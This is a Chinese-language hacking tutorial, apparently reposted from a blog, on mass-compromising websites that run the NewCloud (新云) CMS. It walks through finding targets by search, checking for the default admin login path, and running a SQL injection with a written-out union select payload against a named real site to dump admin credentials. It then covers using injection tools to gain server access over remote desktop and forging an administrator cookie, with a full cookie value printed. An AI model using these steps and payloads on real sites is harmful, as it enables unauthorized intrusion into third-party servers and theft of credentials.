批量入侵新云到获得WEBSHELl

大家好~今天给你们做个教程  叫批量入侵新云到获得WEBSHELL 先声明  ,这个漏洞是我在  www.hackins.net 里发现的漏洞  我不是做广告。 由于我没做准备 ,我就现在开始吧~ 先到baidu或google搜索 :首页连接(首页连接日IP>15000,次页连接无流量限制,欢迎合作连接 我们就随便找吧`这个漏洞只要 没改后台和注册 就能入侵 前面的 我搞了几个`我们就找后面点的吧 反正多的是 新云的  晕`卡  这个 试下后台改了没  默认后台地址admin/admin_login.asp OK 没改``我们注册个号  在点发布文章  在点文章管理 由健 属性 http://www.18236.com/user/articlelist.asp?action=view&channelid=1&ArticleID=1655 这个地址就是注入点了 什么? 你不信``那好我们来看下吧 不由你不信  看到了吧``在把 union select 1,2 ,password,4,5, username,7,8,9 from nc_admin where id=1  这段复制到文章地址后面 就能暴出管理员密  码了   晕 是SQL  的 Provider for SQL Server     我们用工具 如果是ACCESS的数据库 就能马上得到管理员的MD5密码  还有就是 新云的表名是nc_admin  有人问`为什么要登陆呢 因为你没登陆 是不能看文章的不能看文章工具就不能暴到注入点了  晕``工具出错了   SA权限 太好了   用NBSI吧 还真卡~  看下有没开 3389 有开的话就爽了 有开`我们试着建个号  这些命令不用我说了吧 好了 我们登陆看下  看到了吧```那么快就得到了一个 服务器权限 现在你想做什么都OK了  网速慢。。 教程先暂停 ==我带你们 入侵新云 ACCESS 数据库类型的网站  因为我没事先做准备 现在刚好弄到有SA权限 的网站  是运气哈~ 对了 我想注册个动画吧的号 我早就想加入了 可一直没机会 。不知道管理员能不能通融下。联系方式 默认后台地址。。。admin/admin_login.asp 随便选一款可以修改COOKIE信息的工具就可以了。。 http://dodo1.126.tofor.com/cookie.rar ASPSESSIONIDCARADBTC=PPFHKFMBMFMGDOEIMKKPDFGL; admin%5Fnewasp=AdminStatus=%B8%DF%BC%B6%B9%DC%C0%ED%D4%B1&AdminID=1&Adminflag=SiteConfig%2CAdvertise%2CChannel%2CTemplate%2CTemplateLoad%2CAnnounce%2CAdminLog%2CSendMessage%2CCreateIndex%2CAddArticle1%2CAdminArticle1%2CAdminClass1%2CSpecial1%2CCreateArticle1%2CComment1%2CAdminJsFile1%2CAdminUpload1%2CAdminSelect1%2CAuditing1%2CAddSoft2%2CAdminSoft2%2CAdminClass2%2CSpecial2%2CCreateSoft2%2CComment2%2CAdminJsFile2%2CAdminUpload2%2CAdminSelect2%2CAuditing2%2CDownServer2%2CErrorSoft2%2CAddShop3%2CAdminShop3%2CAdminClass3%2CSpecial3%2CCreateShop3%2CComment3%2CAdminJsFile3%2CAdminUpload3%2CAdminSelect3%2CAuditing3%2CAddArticle5%2CAdminArticle5%2CAdminClass5%2CSpecial5%2CCreateArticle5%2CComment5%2CAdminJsFile5%2CAdminUpload5%2CAdminSelect5%2CAuditing5%2CDownServer5%2CAddUser%2CAdminUser%2CChangePassword%2CUserGroup%2CMainList%2COnline%2CVote%2CFriendLink%2CArticleCollect%2CSoftCollect%2CUploadFile%2CRenameData%2CBackupData%2CRestoreData%2CCompressData%2CSpaceSize%2CBatchReplace&AdminGrade=999&AdminPass=9f7fa2c6858e1e77&RandomCode=3N263U7hgb314iwb&AdminName=admin 这个是新云cookie值。。后台登陆的。 我们来修改 name  和adminpass 用拿到的密码替换COOKIE信息里的。。 admin/admin_index.asp 是新云的后台管理页面。。
原文地址:https://www.cnblogs.com/adodo1/p/4326943.html